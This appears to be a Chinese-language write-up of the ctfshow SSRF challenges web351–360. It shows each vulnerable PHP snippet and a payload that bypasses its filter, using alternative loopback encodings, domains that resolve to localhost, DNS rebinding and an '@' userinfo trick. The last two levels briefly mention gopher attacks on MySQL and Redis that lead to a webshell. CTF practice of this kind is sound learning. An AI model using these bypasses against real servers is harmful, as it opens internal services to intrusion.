ctfshow-ssrf系列
writeup , SSRF
CTF, SSRF
web351
1 2 3 4 5 6 7 8 9 10 11
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?>
|
flag在/flag.php下,但是提示只有本地用户可以访问
直接posturl=http://127.0.0.1/flag.php
web352
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhost|127.0.0/')){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
这里过滤了localhost和127.0.0,但实际上ipv4的点分十进制写法不一定要按每八位平均分4个点,也可以只分一个点,那么就是前八位和后24位的十进制组成,例如127.65536会被解析成127.1.0.0。所以127.0.0.1也可以写成127.1
payload=url=http://127.1/flag.php
web353
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhost|127\.0\.|\。/i', $url)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
其实ip地址用十六进制表示一样可以被解析,127.0.0.1可以用十六进制来写就是0x7f.0x0.0x0.0x1
,也可以直接用0x7f.0.0.1
payload=url=http://0x7f.0.0.1/flag.php
web354
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhost|1|0|。/i', $url)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
这题的过滤严格了些,但是其实有一些公共的域名可以解析到127.0.0.1
比如:
- safe.taobao.com
- 114.taobao.com
- wifi.aliyun.com
- imis.qq.com
- localhost.sec.qq.com
- ecd.tencent.com
- sudo.cc
payload=url=http://safe.taobao.com/flag.php
web355
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $host=$x['host']; if((strlen($host)<=5)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
host长度小于等于5,很简单
payload=url=http://127.1/flag.php
web356
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $host=$x['host']; if((strlen($host)<=3)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
host小于等于3
payload=url=http://0/flag.php
web357
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $ip = gethostbyname($x['host']); echo '</br>'.$ip.'</br>'; if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) { die('ip!'); }
echo file_get_contents($_POST['url']); } else{ die('scheme'); } ?>
|
过滤了私有ip,这里用DNS重绑定,在http://ceye.io注册可以获取一个域名,可以自己绑定多ip,达到DNS重绑定的效果
payload=url=http://r.nnagih.ceye.io/flag.php
web358
1 2 3 4 5 6 7 8
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){ echo file_get_contents($url); }
|
这题其实跟parse_url没半毛钱关系,,,,
payload=url=http://ctf.@127.0.0.1/flag.php?show
web359
gopher协议打mysql
参数returl是ssrf攻击点
生成payload
蚁剑连接shell,获取flag
web360
gopher打redis
操作同上